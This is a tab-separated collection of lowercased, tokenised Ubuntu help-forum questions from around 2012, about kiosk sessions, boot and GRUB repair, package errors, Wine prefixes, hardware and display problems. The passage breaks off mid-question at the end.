184610	custom session : window does not capture full screen area by default . 12.04	i am trying to create a custom session by creating a custom.desktop file in /usr/share/xesessions folder . remember this is not a gnome or some other session . i have created my own application for this session , which are simple . case 1 chrome browser contents of custom.desktop file [ desktop entry ] name=internet kiosk comment=this is an internet kiosk exec=google-chrome -- kiosk tryexec= icon= type=application issue chrome browser starts in kiosk mode but does not capture complete screen area . some area is left at the bottom and right side of the screen . case 2 custom pygtk app ( quickly ) contents of custom.desktop file [ desktop entry ] name=custom kiosk comment=this is a custom kiosk exec=~/mycustompygtkapp tryexec= icon= type=application issue my custom pygtk app has window.fullscreen ( ) in the code . that means it should open in full screen without the window chrome ( and it does under the normal session ) . but that too , leaves lots of space around it . need help can anyone tell me whats going on here . i think its some issue with borders as pointed out at http : //www.instructables.com/id/setting-up-ubuntu-as-a-kiosk-web-appliance/ ? allsteps in step 8 if by chance , google chromium is not stretched to the edges with the -- kiosk switch enabled there is a simple fix . to stretch chromium simply log in as your regular user and edit chromekiosk.sh to not have the -- kiosk switch . then log in as the restricted user , click the wrench and choose options . then on the personal stuff tab select hide system title bar and use compact borders . close the options screen and stretch chromium to fit the monitor . then go back into the options window and set it to use system title bar and borders . after this is done , log out of your restricted user ( might need to just reboot ) and log into your regular user . edit chromekiosk.sh back to include the -- kiosk switch again and chromium should be full screen next time you log into the restricted user . if i were to use a custom pygtk or a gtkmm app , how should i get around this issue . window.fullscreen ( ) should occupy the complete screen area . this has to be done programmatically or in some other way that can scale . i have to deploy this on large number of machines located at different geographical areas . doing it manually on every machine is not possible .
184618	taking screenshots in lubuntu ( 11.10 )	as you know , by pushing printscreen button on the keyboard , a screen-shot of desktop will be saved on your home folder , but why it does n't work when i open a menu ? for example , when i open lxde menu and then pressing printscreen , nothing happen . neither when menus such as file , edit , view and etc . are open .
184619	keyboard and mouse is not working properly	i am having some weired problem regarding mouse and keyboard . i am using a laptor with a external mouse . when i scroll my mouse it worked in reverse way . and when i am typing with my keyboard it stop working for few moment . if i typed two later repeatedly it missed to draw the 2nd letter . backspace is not working properly either . it need 4 stock to remove a letter . help please
184622	failed attempt to dual-boot ubuntu 12.04 with windows 7	this is my second time installing ubuntu , and i have n't got much luck yet . ( my first ruined windows ' mbr . ) it 's been nearly a week since trying to install and reinstall ubuntu so i can dual-boot it with my existing windows 7 installation . i followed the steps about installing the os from linuxbsdos.com , partitioning my lone hdd into 3 , inserting the easybcd entry of ubuntu to the mbr and all . yet i still have my problems : when i load my ubuntu entry ( which is grub2 ) , all i get is the grub4dos command line . i 'm not a computer technician and i have bleak info about command lines so it 's hard for me to boot it from there . when i load my ubuntu entry ( which is grub legacy or wubi or any other entry than grub2 ) , all i get is a blinking cursor and that 's where it ends . i need to restart my machine all over again . i 'm starting my fifth ( ? ) reinstallation of ubuntu and i hope it 's fine . but then , i 'm not even sure , judging that all my previous installations failed . i have an acer aspire 4755g laptop , with an intel i7-2670qm 2nd-gen processor , 4gb ddr3 ram , 750gb hdd . i used a 64-bit version of precise and my win7 is also 64-bit . can someone help me here ?
184623	ubuntu installed accidently on windows	i 'm new here and would very much appreciate your help i was making a bootable usb to rescue a crashed ubuntu notebook . i was doing this on my sony vio laptop , now i ca n't access my sony files , when i boot the sony up it boots in ubuntu i think i have overwritten the windows boot sector with ubuntu i need to either undo the process or if this is not possible then at least recover my kids childhood memory photos any help to resolve this issue would be very much appreciated p.s i have since removed the hardrive from the sony and tried to read it on a windows machine as an external drive , windows can see the drive but with no data !
184625	how to autostart or remotestart something and stop it another way in 12.04 ?	i want to autostart the software motion with motion -s either at start up of my ubuntu 12.04 and/or via ssh from a different pc . all this is no problem . my question is , how do i correctly stop it locally or from remote when the terminal where motion has been started has already been closed ? and how to correctly close this terminal once motion -s has been started ?
184628	squid logs retention	i have ubuntu server 12.04 lts installed . squid keeps only last 3 days logs . does anybody know how to increase this duration ? i use cron to rotate them on daily basis .
184629	can not delete apt-fast for a clean install	this is my problem : $ destroy apt-fast [ sudo ] password for colbyryptos : reading package lists ... done building dependency tree reading state information ... done package apt-fast is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 14 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable setting up man-db ( 2.6.1-2 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have also tried sudo rm /var/lib/dpkg/lock , followed by sudo dpkg -- configure -a . it then gives me this $ sudo dpkg -- configure -a [ sudo ] password for colbyryptos : setting up man-db ( 2.6.1-2 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : man-db
184631	network does not connect at boot	i am on 12.04 , fresh install . when i boot , the boot screen says connecting to network , later it is changed to something like did not connect , trying for another 60s . however , the network does not connect at the boot . but i can then log in without a network connection , and if i start a network manager service manually from the terminal with sudo service network-manager start , the network is connected without any problems . please , does anybody know where the problem could be ? i do n't want to wait more than two minutes every computer restart . i am new to ubuntu ( and also to upstart ) so i am a bit lost . there is no /var/log/messages , in dmesg i found this record , though it may not be related : init : network-interface ( eth1 ) pre-start process ( 492 ) terminated with status 1 init : network-interface ( eth1 ) post-stop process ( 548 ) terminated with status 1
184636	how to figure if country repository is not updated	i recently noticed that version of the thunderbird is not same on my laptop and on my imac . thunderbird verson on my imac was 13.x while on my laptop it was 15.x . it looked suspicious and i changed repository location on my imac to point to the main repository instead of maltese mirror . it turned out that 422 packages should be updated ! is there a way to make sure that mirror is updated ?
184637	is it possible to obtain a public share link with the original name of the file ?	i do n't want to have public link for downloading and sharing which obfuscates the file name and file type like for example : http : //ubuntuone.com/3y88jj4o7noyengvcnxg88 ( sample link , wo n't work ) . instead , is it possible to obtain a link which shows the file name and file extension ? example : http : //ubuntuone.com/name-of-my-file.mp3 so , how do i find the option that lets me share public links with the original name of the file ?
184642	new install preserving home directory	i have 32bit 11.10 installed on an lvm disk taking up all 500 gb , and i would like to install 64bit 12.04 on top , preserving the data in my home directory . i used to do that pre-lvm by just not formatting the partition mounted as /home , installing over / and /usr and formatting /tmp , but now it do n't recognize the partition table . i 've never had much luck with upgrade and so i just install afresh when i want a new version . surely i can do what i want , ca n't i ?
184645	will xorg 1.13 land in ubuntu 12.10 ?	i am asking this because there may be some optimus nvidia updates before next year april ubuntu release and i read somewhere its connected with 1.13 features ? or i am maybe wrong .
184647	can i try latest nautilus ( 3.5.4 now ) in lubuntu 12.04 ?	http : //www.iloveubuntu.net/redesigned-nautilus-landed-ubuntu-1210 is it only for quantal ?
184650	can i make nautilus look better in lubuntu 12.04 ?	i mean that pcmanfm and thunar follow my theme : nautilus does not : i have to add that i do not want to change my present theme . and i guess that is the problem , as it does not have a gtk3 folder included .
184652	how to check if a cdrom is in the tray remotely ( via ssh ) ?	i have a server running ubuntu 10.04 ( it 's on the other side of the world and i have n't built up the wherewithal to upgrade it remotely yet ) and i have been told that there is a cd in one of it 's two cd drives . i want to rip an image of the cd and then download it to my local computer ( i do n't need help with either of these steps ) . however , i can not seem to confirm whether or not there actually is a cd in the drive as i was told . it did not automatically mount anywhere ( which i 'm thinking might just be a result of it being a headless server not running x , nautilus , or any of the other nice user friendly things ) . there are two cd drives connected via scsi : austin @ austinvpn : /proc/scsi $ cat /proc/scsi/scsi attached devices : host : scsi0 channel : 00 id : 00 lun : 00 vendor : ata model : wdc wd400eb-75cp rev : 06.0 type : direct-access ansi scsi revision : 05 host : scsi1 channel : 00 id : 00 lun : 00 vendor : lite-on model : ltn486s 48x max rev : yds6 type : cd-rom ansi scsi revision : 05 host : scsi1 channel : 00 id : 01 lun : 00 vendor : samsung model : cd-r/rw sw-248f rev : r602 type : cd-rom ansi scsi revision : 05 however when i try mounting either of these devices ( and every other device that could possibly be the cd-drive ) , it says no medium found : austin @ austinvpn : /proc/scsi $ sudo mount -t iso9660 /dev/scd1 /cdrom mount : no medium found on /dev/sr1 austin @ austinvpn : /proc/scsi $ sudo mount -t iso9660 /dev/scd0 /cdrom mount : no medium found on /dev/sr0 austin @ austinvpn : /proc/scsi $ sudo mount -t iso9660 /dev/cdrom /cdrom mount : no medium found on /dev/sr1 austin @ austinvpn : /proc/scsi $ sudo mount -t iso9660 /dev/cdrom1 /cdrom mount : no medium found on /dev/sr0 austin @ austinvpn : /proc/scsi $ sudo mount -t iso9660 /dev/cdrw /cdrom mount : no medium found on /dev/sr1 here are the contents of my /dev folder : austin @ austinvpn : /proc/scsi $ ls /dev agpgart loop6 ram6 tty10 tty38 tty8 austinvpn loop7 ram7 tty11 tty39 tty9 block lp0 ram8 tty12 tty4 ttys0 bsg mapper ram9 tty13 tty40 ttys1 btrfs-control mcelog random tty14 tty41 ttys2 bus mem rfkill tty15 tty42 ttys3 cdrom net root tty16 tty43 urandom cdrom1 network_latency rtc tty17 tty44 usbmon0 cdrw network_throughput rtc0 tty18 tty45 usbmon1 char null scd0 tty19 tty46 usbmon2 console oldmem scd1 tty2 tty47 usbmon3 core parport0 sda tty20 tty48 usbmon4 cpu_dma_latency pktcdvd sda1 tty21 tty49 vcs disk port sda2 tty22 tty5 vcs1 dri ppp sda5 tty23 tty50 vcs2 ecryptfs psaux sg0 tty24 tty51 vcs3 fb0 ptmx sg1 tty25 tty52 vcs4 fd pts sg2 tty26 tty53 vcs5 full ram0 shm tty27 tty54 vcs6 fuse ram1 snapshot tty28 tty55 vcs7 hpet ram10 snd tty29 tty56 vcsa input ram11 sndstat tty3 tty57 vcsa1 kmsg ram12 sr0 tty30 tty58 vcsa2 log ram13 sr1 tty31 tty59 vcsa3 loop0 ram14 stderr tty32 tty6 vcsa4 loop1 ram15 stdin tty33 tty60 vcsa5 loop2 ram2 stdout tty34 tty61 vcsa6 loop3 ram3 tty tty35 tty62 vcsa7 loop4 ram4 tty0 tty36 tty63 vga_arbiter loop5 ram5 tty1 tty37 tty7 zero and here is my fstab file : austin @ austinvpn : /proc/scsi $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/austinvpn-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=ed5520ae-c690-4ce6-881e-3598f299be06 /boot ext2 defaults 0 2 /dev/mapper/austinvpn-swap_1 none swap sw 0 0 am i missing something/doing something wrong , or is there just no cd in the drive or is the drive possibly broken ? is there any nice command to list devices with mountable media ? thanks in advance for any help !
184656	boot acer aspire s3-391 from sd card	i have installed and able to boot from sd card on my acer apire 1830t . because of that i bought a 64 gb sd card . however , a couple of weeks ago the pc did not work . i took it to repair . in the mean time i really need a computer to use . so i bought the acer aspire s3-391 . however , i can not boot the pc from the sd card . can some kind soul out there help ? please .
184657	why does the network icon disappear on every reboot ?	i am using ubuntu 12.04 . after spending an hour or two working out how to find the network icon , i find that when i reboot the machine , i have to go through the whole procedure again . the network menu is not there - so first i have to find the terminal . this has no particular location that i can find but usually i have to type terminal in the dash . then i have to type nm-applet in terminal the network manager icon then appears , but works only if the terminal window remains open . shut down the terminal window and the network disappears . this is a pain - plus i have to type my password in every time , which is another waste of time , thought this has always been a problem . can anyone tell me how to make the web automatically connect at startup without any intervention from me ?
184658	bluetooth fix for ubuntu 12.04 , lenovo g580	bluetooth not working , it shows turned on but manager indicated bluetooth disabled . uninstalled default manager and installed blueman . the same with blueman , clicking on connect to devices gets response 'adapters not found ' . i 've found many more people with the same problem . the fixes found in the archive do n't work for me . i 've tried a couple of things from the forum . i 'm not familiar with computer hardware or software but have been using ubuntu cause it saves me money , it 's fairly easy to use and it does not tax my mid-range lap . any help will be appreciated .
184665	how apt-get determines when to download translation file ?	i 've been able to successfully build local repository . when i do apt-get against this local repository everything works fine . sample output- hit http : //192.168.1.142 precise inrelease hit http : //192.168.1.142 precise/contrib amd64 packages ign http : //192.168.1.142 precise/contrib translationindex ign http : //192.168.1.142 precise/contrib translation-en after checking that everything is working fine , i copied the repository to production server . now i am getting below error message : err http : //www.domain.com precise/contrib translation-en error reading from server . remote end closed connection [ ip : a.b.c.d 80 ] why apt-get is trying to download translations file from one server ( and if it does n't find it gives error ) but not from other ? i 've checked http headers and both servers are sending content-type : text/html ; charset=utf-8
184674	how do i tell winetricks to work with a different prefix ?	i 'm trying to enable alsa on different prefix than default through winetricks . more specifically , the prefix that has rosetta stone on it , as it can not see my microphone . when i open winetricks , it only lets me select default . i tried anyway , on default , and it did not resolve the issue . i saw some answers online , through the terminal , but that did n't work either . maybe i have the syntax wrong ? steve @ stevelap : ~ $ wineprefix=~/.playonlinux/wineprefix/rosetta sh winetricks alsa sh : 0 : ca n't open winetricks steve @ stevelap : ~ $ sudo wineprefix=~/.playonlinux/wineprefix/rosetta sh winetricks alsa [ sudo ] password for steve : sh : 0 : ca n't open winetricks could anyone please offer assistance ? thanks !
184676	disk boot failure after power outage	i recently experienced a power outage whilst logged on to 11.04 with xp running on virtualbox . when i now try to boot , i receive the disk boot failure , insert system disk and press enter . i have run a disk utility and all seems fine . i can boot from a live usb and browse the files on the drive . fdisk returns the following : - disk /dev/sda : 320.1 gb , 320071851520 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007cc25 device boot start end blocks id system /dev/sda1 * 1 125 999424 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 125 374 1999872 82 linux swap / solaris partition 2 does not end on cylinder boundary . /dev/sda3 374 38914 309569536 83 linux disk /dev/sdb : 1048 mb , 1048576000 bytes 33 heads , 61 sectors/track , 1017 cylinders units = cylinders of 2013 * 512 = 1030656 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x20ac7dda this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 1601838 1816876 216435558+ 7 hpfs/ntfs partition 1 has different physical/logical beginnings ( non-linux ? ) : phys= ( 187 , 180 , 14 ) logical= ( 1601837 , 17 , 6 ) partition 1 has different physical/logical endings : phys= ( 784 , 0 , 13 ) logical= ( 1816875 , 10 , 55 ) partition 1 does not end on cylinder boundary . /dev/sdb2 ? 1625446 2595868 976730017 16 hidden fat16 partition 2 has different physical/logical beginnings ( non-linux ? ) : phys= ( 906 , 235 , 61 ) logical= ( 1625445 , 2 , 35 ) partition 2 has different physical/logical endings : phys= ( 262 , 116 , 59 ) logical= ( 462252 , 6 , 37 ) partition 2 does not end on cylinder boundary . /dev/sdb3 ? 1 1 0 6f unknown partition 3 has different physical/logical beginnings ( non-linux ? ) : phys= ( 370 , 101 , 50 ) logical= ( 0 , 0 , 1 ) partition 3 has different physical/logical endings : phys= ( 10 , 114 , 13 ) logical= ( 2133615 , 4 , 57 ) partition 3 does not end on cylinder boundary . /dev/sdb4 24939 484122 462167897 0 empty partition 4 has different physical/logical beginnings ( non-linux ? ) : phys= ( 0 , 0 , 0 ) logical= ( 24938 , 6 , 17 ) partition 4 has different physical/logical endings : phys= ( 0 , 0 , 0 ) logical= ( 484121 , 13 , 4 ) partition 4 does not end on cylinder boundary . partition table entries are not in disk order any thoughts ?
184677	need to repair mbr without using cd	i just reinstalled windows 7 on my pc which erased my master boot record and i ca n't boot into my ubuntu 12.04 precise pangolin partition . the computer in question is an ultrabook , so i do n't have a cd drive to boot from . is there a way to repair the mbr from windows ?
184682	google chrome does not show nimbus roman no9 l font	well , to begin with here 's webpage : http : //seedconference.com/seed.php here 's its css : p { font-family : times , times new roman , times-roman , georgia , serif ; } here 's alias : $ fc-match times n021003l.pfb : `` nimbus roman no9 l '' `` regular '' firefox shows everything as it should be , but chrome shows in liberation serif . i tried to play with chrome 's font settings . but it did n't change anything . any solutions ?
184683	how can i theme synaptic manager ?	i use lubuntu 12.04 and a gtk2 theme , elegant arch . with such a theme , gtk2 applications like thunar will be themed , while others like nautilus , would be not ( see this question ant the images there ) . because i wanted to theme gtk3 applications like nautilus , audacious etc. , i have copied the `` gtk-3 '' folder from the main folder of a gtk3 theme into the main folder of my elegant arch theme , which is in home/username/themes . using the gtk3 folder from this full flat theme i got a pretty similar look in gtk2 and gtk 3 apps . lubuntu desktop center , ubuntu desktop center , network options and other such apps are now themed ( before they were not ) . even update manager is . but why is synaptic manager not themed ?
184685	ubuntu dual monitors clone twinview	i have an issue - external crt monitor connected to samsung r528 ubuntu 12.04lts pc . got it working with my nvidia card , but in a wrong way . now both screens are cloned , they dont share the same image but workspace . for example - when i 'm in monitor1 and press ctrl+alt+left it moves left one workspace on both screens . how to shut this thing off and make seperate workspace controls for each screen ? # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 13:37:33 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : xconfig , vertrefresh source : xconfig identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 310m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 , dfp : nvidia-auto-select +1024+0 '' subsection `` display '' depth 24 endsubsection endsection
184691	change permission from -rwxrwxr-x to drwxrwxr-x	i have a php file which is trying to read and write xml files on my ubuntu server , however the problem is that it does not have permission to do this ( permission denied error ) . i have tried the following chown www-data read_write.php with no luck what is the proper way to change permission for this file ? more info -rwxrwxr-x 1 www-data www-data 14092 sep 6 12:33 read_write.php
184694	deploying non-linux iso on maas server	i have installed maas server on ubuntu 12.04 . now i want to know that whether it is possible to deploy non-linux iso images on maas server . as ubuntu images are working ; we can make it useful for non-tux people .
184697	wubi installation of kubuntu 12.04.1 lts hangs at splash screen	system : toshiba satellite laptop : specs : intel pentium dual core 1.7 ghz , mobile intel 965 gpu , 2 gb ram - with windows vista home premium . ( trying to dual-boot this and kubuntu ) installed kubuntu using wubi ( in the same folder ) , rebooted , then selected kubuntu . a message says : completing ubuntu installation in 3 ... 2 ... 1 after the kubuntu splash screen starts with the dots changing colour ( black to white ) . when they all turn black , the whole screen hangs . i cant even get to the login screen yet . however , when using demo mode , everything is fine . so what is going on ?
184703	matlab install - java permission denied	matlab version 2012 . i know there are many threads about this , suggesting to chmod +x the following files ( if you are in installation directory ) : sys/java/jre/glnx86/jre/bin/java sys/java/jre/glnxa64/jre/bin/java i also chmodded the install file in root of installation directory . however , after running sudo ./install i still get : preparing installation files ... installing ... ./install : 1 : eval : /tmp/mathworks_4880/sys/java/jre/glnxa64/jre/bin/java : permission denied finished how is this possible ? : )
184704	the noip2 ( no-ip.com ) package was deleted from the repository , now what ?	the no-ip websites still provides ubuntu users with an installation guide that uses aptitude , but the package noip2 has been deleted from the repository . is there a way to find out why a given package got deleted from the repository ? is it possible that it will come back or has to be resubmitted by no-ip.com ?
184707	ca n't install due to `` udeb file failed the md5 checksum verification '' error	i have been trying to get ubuntu 12.04.1 ( desktop-i386 ) running on my laptop . have burned a boot-able cd containing 12.04.1 . it allows me the option of trying out ubuntu before installing , but the installation fails . it cites an input/output error errno5 . i have tried burning another disc and using another usb disc drive , but they all give the same result as above . i then downloaded the alternate-i386 and loaded it onto a boot-able usb flash-drive . during installation , it produced an error as well , and selecting the option to check the cd 's integrity produced the following : the ./pool/main/1/linux/nic-usb-modules-3.2.0-29-generic-pae-di_3.2.0-29.46_i386.udeb file failed the md5 checksum verification . your cd-rom or this file may have been corrupted . proceed to check the integrity of the aforementioned cd produced the same message as well . any help guys ? really want to get ubuntu up and running .
184715	multiple installations	we are planning to install around 15 machines with desktop version and we need same software on all machine . can you suggest best approach to save time ? we are not much technical and we install software by going to software manager , we just need to avoid this as it takes lots of time to download all software each time . thanks
184716	how to make append-able cd ?	i want to make a append-able cd so that i can write data to it any time i want . i could do this using the native cd burner of windows xp/7 . but i know how to do this in windows . can anyone help me ?
184724	how can i make `` file edit view ... '' of windows always be displayed at the top line of unity ?	all my applications are maximized . but i can not see `` close/mini/maxi file edit view '' all the time . instead , i see the name of window and i have to drag my mouse to see what i want . is it possible to make it ? thank you for your time .
184725	how do i update wine in one wineprefix ?	does anyone know how i can go about updating the version of wine that one prefix uses without self-destructing everything in it ? i want to bring it from 1.4 to 1.5.5 - i read on a forum that someone got the microphone working in rosetta stone with ubuntu 12.04 and wine 1.5.5 . thanks for any guidance on this matter . : ) http : //ubuntuforums.org/showpost.php ? p=11984993 & postcount=20 update : issue resolved . thanks to zuberuber i was able to approach the issue in a different light . : ) i made a new prefix called `` test '' in playonlinux . i compared the new prefix with the rosetta prefix . it contained a playonlinux.cfg file along with the reg files . it contained : arch=x86 version=1.5.0 i copied this over to the rosetta prefix and adjusted it : arch=x86 version=1.4.1 after doing that , i was able to change it from 1.4.1 to 1.5.0 . i confirmed it in the prefix 's winecfg 's about tab .
184727	wake up from sleep with gpio ( i2c )	my situation : ubuntu 10.10 running on an atom driven main board the main board has a gpio chip integrated ( f75111 by fintek ) . they communicate through i2c ( smbus ) . we have a driver running that works , we can send outputs and read inputs . great ! we would like to use the i/o interface to suspend ( sleep ) and wake up again . sleep is no problem . on an incoming input : run s2both . ubuntu goes to sleep and prepares a hibernate state , so when the power-cord is unplugged by accident , it will wake from hibernate . but the big question : how to wake on an input if the os is already sleeping ? you can wake from a lot of devices ( lan , usb , ring , etc ) but i ca n't find out how to wake from a i2c card . please help .
184728	how do i lock the screen from a terminal ?	i am using ubuntu 12.04 . is there any way to lock the screen or session from a terminal command or script ? are there any changes happen in 13.04 ?
184734	12.04 : status bar and quick launch bar gone	i 'm new to ubuntu and i have big problem : i was running on 11.10 , which was working fine , but since the upgrade to 12.04 it has become not usable . here is why : shortly after booting , my monitors ( i have 2 ) freeze for approximately 2 seconds , then turn black and one after the other `` recover '' . the problem is , that after this happens the status bar , the quick launch bar and the window controls and borders are gone . actually because i 'm new to ubuntu i do n't know what to do . the only thing i tried was sudo service lightdm restart which resulted in a black screen printing 3 messages and [ ok ] next to them and i could n't do anything . i 'd appreciate any kind of help . what could be the cause ? how can debug it ? how can i fix it ? p.s : if anybody thinks it 's related to my graphic card i have a intel i5 with graphic on board .
184738	is it possible to make all currently open windows minimize , whenever i open a new application ?	when i open ( not only running ) an application , how to make the other windows minimized ? ps it seems i can not do it with devilspie . thank you for your time . ubuntu 12.04
184744	printing checks from cli or gui	looking for a program or a way to print onto my bank checks in ubuntu . i do n't want to use gnucash or kmymoney as those are bank register program 's and it 's too much work to open one of those each and every time to print out a simple check . i keep registry else ware so i do n't need them to also . lazarus does n't have a good reporting tool , i have tried fortesreports for lazarus and it 's very very very buggy , wo n't print landscape and wo n't change paper size . it 's just a mess . so i ca n't make an application myself . i thought about going into xp and with delphi making the app , a lot of delphi 7 apps run in wine . but if i can help it i would like to stick to linux native somehow . so does anyone know of a way or script to print checks ? i tried the ruby script for it but i can not find anyway to download it anymore , all links are dead . same with python check printing app i found for linux . i made a bash script for it , but it 's not perfect and i ca n't really control field margins and spacing . bash script : # ! /bin/sh day= $ ( zenity -- entry -- text `` day of month '' ) ; month= $ ( zenity -- entry -- text `` month '' ) ; amount= $ ( zenity -- entry -- text `` amount for check '' ) ; to= $ ( zenity -- entry -- text `` the check is made out to '' ) ; letters= $ ( zenity -- entry -- text `` amount in letters '' ) ; rm -f prcheck echo `` guatemala $ day de $ month del 2,012 $ amount $ to $ letters '' > prcheck lp -o media=2.5x6.5 -o landscape -o page-top=-0.5 prcheck like i said this works fine , problem is the spacing is not 100 % perfect , and as the date goes changing so does the amount based on the text width of the month . i read somewhere that latex might be able to do it , but i know absolutely nothing about latex or how to use it . i would like something that i can just enter the fields and then it prints . even if i have to use a bash script to get the fields and send it to a cli program like i 'm doing now .
184747	how can i compress an mp3 file ?	well that is my question ! i used to download a program in windows that used lame to compress audio of mp3 files and made them shorter in size but i do n't know how to do this in ubuntu ! does anybody know anything about this ? please remember that i had just installed ubuntu so i do n't know practically nothing please also excuse my english , i 'm a native spanish speaker
184748	rhythmbox and german umlauts	i occasionally stream radio stations from germany and it appears that there is an encoding issue in rhythmbox as umlauts are not displayed properly in this pop-up bubble in the screen corner . as i can not influence the tags it would be nice if rhythmbox could handle this for me/ handle multiple encodings in the screenshot 'hรถrt ' becomes a combination of an a with a bar and a paragraph sign
184754	where can i find power manager program in lenovo thinkpad e530 edge ?	i am using linux for the first time and i am using ubuntu 12.04 i am trying to find power manager on thinkpad lenovo , like what we have on windows 7 .
184759	using ubuntu 12.04 with chrome stable/beta and watching youtube gives be a black bar at the top	as the picture as you can see there 's a black bar , is there anyway to fix this ?
184760	files in nautilus stopped updating automatically , how to fix this ?	files in nautilus stopped updating automatically . to see a new files i have to refresh a directory ( ctrl+r ) . how to fix this ?
184761	ubuntu 12.04 install black screen	when i try to install ubuntu 12.04 i get the grub 1.99 screen that allows me to select ubuntu install , or try ubuntu with out installing . when i select install ubuntu the screen goes black and i can tell the hard drive is running , but there are no on screen prompts . i looked into this problem and attempted to change a few variables by pressing `` e '' to edit the ubuntu install boot screen i then changed splash to nospash , quiet to noquiet , and add nomodeset at the end of the line that starts with linux before the `` -- '' . this still changes nothing when i press f10 to boot . i have tried removing quiet and splash altogether and adding nomodeset , but still to no avail . i am a little frustrated and do n't know what to do . any help would be greatly appreciated ! the system is brand new - no os : hardware : zotac zbox zbox-id81-plus-u nettop computer - intel celeron 857 1.20 ghz - 8 gb ram - 320 gb hdd - intel graphics media accelerator hd graphics card
184763	can i make ubuntu boot from a sd card ?	is it possible to download ubuntu 12.04 to an sd card and then use that to install or to boot directly from it , rather than using a usb stick ? the plan is to install ubuntu on an old toshiba portege m200 laptop , which does not have a cd drive .
184767	no grub screen or recovery mode on boot after 12.04 upgrade	i tried the live boot cd and boot-repair , also loaded the desktop install cd , and it looks like all partitions check out ok . however , when i try to boot linux ( the only bootable partition on the computer ) i get a blank screen . every so often the screen give me something akin to : assuming write through cache asking for cache data failed it appears to start booting , then hangs . ctrl+alt+delete shuts down the machine the last message during boot is `` starting timidity++ alsa midi emulation ... [ ok ] '' i used boot-repair to generate a boot info report . one thing looks odd to me- it reports a missing core.img on /dev/sda1 . here is the full info : boot info script 0.61.full + boot-repair extra info [ boot-info august 2nd 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos1 ) /boot/grub on this drive . = > windows is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda1 and looks at sector 18406911 of the same hard drive for core.img , but core.img can not be found at this location . operating system : ubuntu 12.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/extlinux/extlinux.conf /boot/grub/core.img sda2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 63 307,339,514 307,339,452 83 linux /dev/sda2 307,339,515 312,576,704 5,237,190 5 extended /dev/sda5 307,339,578 312,576,704 5,237,127 82 linux swap / solaris drive : sdb _____________________________________________________________________ disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 625,142,447 625,140,400 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 11b4d633-7863-40b2-a6ca-da5f82c3ad0b ext4 /dev/sda5 cb8d65f4-8cf9-4088-b804-e3dea2151033 swap /dev/sdb1 349e7c109e7bc8be ntfs personal1 ================================ mount points : ================================= device mount_point type options /dev/sdb1 /media/personal1 fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sr0 /live/image iso9660 ( ro , noatime ) ... ( a bunch of config file info- let me know if anyone wants to see it ! ) but usually i just get `` can not display this video mode '' , which i know means the video output is not usable by the 